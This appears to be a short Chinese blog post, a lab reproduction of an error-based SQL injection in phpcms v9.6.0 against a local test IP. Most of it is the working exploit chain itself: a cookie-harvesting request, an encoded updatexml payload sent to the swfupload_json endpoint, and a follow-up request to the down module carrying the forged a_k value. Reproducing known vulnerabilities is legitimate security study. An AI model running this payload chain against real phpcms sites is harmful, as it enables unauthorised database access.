phpcms_v9.6.0_sql注入漏洞复现
源码https://wwi.lanzouy.com/iDvt1yw8exg
漏洞复现
访问
/index.php?m=wap&c=index&a=init&siteid=1获取cookie
在发送一个POST请求
头http://192.168.0.103/phpcms_v9.6.0_UTF8/install_package/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26构建一个sql报错注入的语句
解码后面http://192.168.0.103/phpcms_v9.6.0_UTF8/install_package/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=&id=%*27 and updatexml(1,concat(1,(user())),1)#&m=1&f=haha&modelid=2&catid=7&
POST内容
1 | userid_flash=d698WOQsXmCwdTCLSW5CN_aEUeQVAPcFAqSq7-nZ #上面请求的cookie值 |
得到第二个cookie
然后构建一个get请求
xxxinit&a_k=后面这个就是上面的cookie值
1 | http://192.168.0.103/phpcms_v9.6.0_UTF8/install_package/index.php?m=content&c=down&a=init&a_k=8068qLWSDNB6ODqmqllaIwav_Hh7JQ3UAYGM81uI6D28x1Ubvkq6I-eT-9x9_uEFnGlxXOKJd7pfkV5XRYm7SEviSS0157Bxmo7GZ1Kgen31-u1grBBNY680KOFbTHOP4SV8k0Fl_UAjbLEpwUXPM7tQYy5DWyJCpGnGwhuL_WnKLP42si9b9gwSJ8KA5j88xoqH-iZauCig-7fB_CanZkS7dNxiV2s82RbisYiOLn-TFFH--2JwuF_aIjV0T69gWyxRhwV6Co8IJRQd91bpHGzs6uArES6h1y95Y-W6pmpECSE8FSdSy2K0SaCN6Kga8ouCsLq7M1tTw-K59Y_ranYXcaF1N_tvsmDAd7LNxreK3OCoCm_yM8h1BQ4XLIuFgnY8Y4PtiOoOhbihN707k3CQm9ivw1Apwrd3KGrbMC3Euu7f1LjmVErIUdzga8dypNR3zap5NlU4mUoUVpzpKNwnmZercDH_OeqIutAMqvxy3QKiNorKpCR2vA |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 ZSSのW啥都学!
![微信]()
微信![支付宝]()
支付宝
